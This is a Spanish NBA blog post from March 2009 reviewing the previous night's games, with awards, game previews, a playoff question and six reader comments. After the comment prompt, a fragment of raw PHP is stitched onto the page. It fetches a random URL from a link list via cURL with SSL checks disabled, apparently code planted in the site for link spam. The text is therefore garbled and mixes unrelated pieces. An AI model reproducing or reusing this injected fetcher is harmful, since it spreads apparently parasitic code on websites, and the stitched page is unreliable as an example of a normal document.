La crónica (4/03/2009)

05 de March de 2009 por TheDeerHunter

Por TheDeerHunter & MagicJohnson32

Empezamos a vislumbrar el final de la temporada regular. Dos equipos ya han asegurado su plaza de Playoffs: los Cavs lo lograron anoche destrozando a los Bucks en casa y los Celtics hicieron lo propio en New Jersey, eso sí, con bastantes dificultades y una cierta dosis de buena suerte.

Los que no lo han hecho todavía (y lo que te rondaré…) son los Suns. La primera visita de Shaq a su más inmediato ex-equipo resultó un gran partido. Con Gentry el equipo vuelve a funcionar bien en ataque, pero la defensa hace aguas por todos lados. Ahora mismo es un suicidio enfrentarse a Wade y no tener una buena propuesta defensiva y es que Flash les hizo un roto de magnitudes siderales. A su lado, Beasley y Cook hicieron el mejor partido de la temporada. Buen momento para empezar a salirse.

Extraordinario partido también el jugado en Dallas con una gran respuesta de Kidd y Howard a su ridículo del otro día. Deben alegrarse los Mavs porque ganar a San Antonio no se logra todos los días. En los Spurs, mal partido de Finley y terrorífico el de los suplentes. Como no puede ser de otra manera, esperan a Manudo como agua de mayo.

Los Jazz ampliaron su buena racha a costa de la de los Rockets. Este equipo ha recuperado sus fundamentos en el mejor momento: Fortaleza en casa, un Deron Williams de master y un juego interior versátil y solvente. No va a ser un rival cómodo para nadie en primera ronda y mucho menos si termina logrando ventaja de campo para la misma.

Para terminar con el repaso de los equipos en puestos de postemporada, Portland batió a Indiana (al contrario, por cierto, de lo que dice MARCA) pero los Hawks cayeron en el Madison, con grandísimo partido de Hughes y también de Gallinari.

Hay que destacar también otra extraordinaria actuación de Marc, rozando en esta ocasión el triple doble ni más ni menos frente a Camby y en un escenario como es el Staples. Por último, los Bulls vencieron a los Warriors y Oklahoma a Washington.

PREMIOS

MVP: Criticamos a Rudy Gay cuando lo merece y lo alabamos cuando se lo gana, como anoche. 35 puntos con 12 de 22 en tiros de campo y 9 de 9 en libres, más 8 rebotes, 4 asistencias y 2 robos logró en el triunfo de los Grizzlies en pista de los Clippers. No nos sorprenden tanto los 35 puntos, 16 asistencias y 6 rebotes de Wade ante los Suns o los 26 puntos y 14 asistencias de Deron Williams en la victoria de los Jazz sobre los Rockets.

El rookie: Sensacional el despliegue de juego que protagonizó Marc Gasol anoche. Anotó 7 de sus 8 tiros de campo, 6 de 9 en libres, para un total de 20 puntos, repartió 10 asistencias, atrapó 8 rebotes, recuperó 3 balones y puso 3 tapones.

La sorpresa: La vida es más fácil contra la defensa de los Suns. Daequan Cook y Michael Beasley lograron sus mejores marcas anotadoras como profesionales en el triunfo de los Heat ante los de Arizona. Cook anotó 6 triples de 8 intentos para 27 puntos, mientras que Beasley logró 28 puntos con 10 de 16 en tiros. Aunque, para sorpresa, el nuevo rol de líder que ha adquirido Larry Hughes en los Knicks y su extraordinario acierto en los triples.

La decepción: No es algo que venga de hoy. La temporada de Josh Smith está siendo muy pobre pero lo más preocupante es la regresión general en su juego. Su porcentaje de tiros libres está cayendo en picado (anoche siguió contribuyendo a ello con un 1 de 3), su porcentaje en triples sigue clavado en el 25%, y ha empeorado en rebotes, asistencias, tapones y puntos. Pareció despegar en diciembre y enero pero desde entonces su rendimiento ha ido empeorando. En los últimos tres partidos, Smith acumula un total de 1 asistencia, 10 rebotes, 3 robos, 3 tapones y 10 pérdidas. Además, ha fallado (atención al dato) 14 de sus últimos 16 tiros libres.

El mayor esfuerzo en vano: Tony Parker mantiene su gran estado de forma y, pese a la derrota ante los Mavs, el francés anotó 37 puntos con un 60% de acierto, 4 rebotes y 4 asistencias. Tampoco sirvieron para ganar los 34 puntos y 4 asistencias de Vince Carter ante los Celtics.

LA PREGUNTA DEL DÍA

Imaginaos que formáis parte de la franquicia que acabará primeros en el Este o en el Oeste. ¿A que 2 equipos (uno por conferencia) no querríais encontraros de ninguna manera en primera ronda de Playoffs?

RAZONES PARA TRASNOCHAR

El jueves nos trae dos partidos protagonizados por equipos del Oeste en lucha directa por los Playoffs. Éstos son los encuentros:

Mavs @ Hornets (2:00 h. GMT+1). Si yo fuera Kidd, me haría el lesionado. O eso, o que se atenga a las consecuencias. Chris Paul tiene por costumbre destrozarlo y la última prueba de ello se la ofreció en Dallas el pasado 14 de enero al firmar 33 puntos, 10 rebotes, 11 asistencias y 7 recuperaciones. Los Mavs, octavos, llegan con la moral de haber ganado a los Spurs y ver como el colchón sobre los Suns se ampliaba a 3 partido, pero los Hornets empiezan a responder a las expectativas y están en su mejor momento de la temporada

Blazers @ Nuggets (4:30 h. GMT+1). Los Blazers sufrieron lo indecible para alargar su racha como local. Apenas 24 horas después se desplazan a Colorado para visitar al equipo que les precede en las clasificaciones por sólo medio partido, unos Nuggets que han enlazado dos derrotas seguidas y ven seriamente amenaza su tercera posición en el Oeste. Melo volverá tras su sanción de un partido por indisciplina y apostamos a que tendrá ganas de demostrar cosas.

Comenta

6 comentarios a esta entrada

  1. couxe dice:
    #1

    En el Este no me gustaría nada toparme con Philadelphia, que es bastante fácil que acaben séptimos u octavos, y tampoco sería deseable un cruce con Detroit… Aunque lo que sería la repera (eso sí, bastante improbable) sería toparte con Miami…

    En el Oeste como todo está tan sumamente igualado (entre el 2º y el 8º hay 4 partidos), podría tocarte cualquiera… así que, siendo los Lakers (que salvo accidente aéreo quedarán primeros) este sería mi ránking:
    San Antonio; pa cagarse…
    Utah; si están todos y bien, miedito… y a jugar a tope desde el primer hasta el último minuto…
    Hornets y Denver; Sin problema, pero con cuidadín que a la mínima te la lían…
    Blazers y Phoenix; Para ir cogiendo tono antes de la siguiente ronda…
    Houston y Dallas; unos días libres antes del próximo cruce…

      Citar

  2. arivas dice:
    #2

    Para mi los cocos son Utah y Miami, pero creo que ambos quedaran mas arriba del 8º puesto. El oeste está mas igualadoy pudiera ser , pero Miami está mas cerca del 4º puesto que del 8º, con lo cual en el este no me fiaria de Detroit.

      Citar

  3. Viva_Dirk dice:
    #3

    Coincido con Couxe en el Este, creo que los Sixers son un rival peligroso.

    Eso si en el Oeste no creo que los Mavs vayan a ser un rival nada facil, a decir verdad solo veo cierta facilidad contra Houston.

      Citar

  4. Miguel dice:
    #4

    Yo estoy de acuerdo con ARIVAS Utah y Miami serían peligrosísimos, aunque New Orleans y Philadelphia no se quedan atrás. Me sorprende mucho que pese a lo mal que lo estan haciendo los Suns, en el Este ahora serían 4os.

      Citar

  5. Txusma dice:
    #5

    De los q tienen muchas posibilidades de ser octavos, en el Este los cocos serían, para mi, Detroit, Philadelphia y Chicago. En el Oeste cualquiera te puede dar un susto, pero el más grande posiblemente serían los de Utah y New Orleans.

      Citar

  6. kantonyo dice:
    #6

    En el Oeste hay bastante nivel en los 9 equipos que se disputan los playoffs, pero teniendo en cuenta las posibilidades de quedar octavo y teniendo en cuenta de que será Lakers el primero, creo que lo mejor seria encontrarse a un equipo como Blazers, con jugadores sin experiencia playoffs y bastante jovenes, y por el contrario creo que lo peor sería encontrarse con Utah si dispone de todos sus jugadores.

    En el Este, siendo Celtics o Cavs, lo tendran mucho más facil, creo que Philadelphia no tendra problemas para ser mejor que un octavo puesto, por lo tanto teniendo en cuenta los que se estan jugando esa posición, creo que el más dificil sería Indiana Pacers, pero simplemente porque han demostrado que no se arrugan contra equipos fuertes, y además del potencial de Granger.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>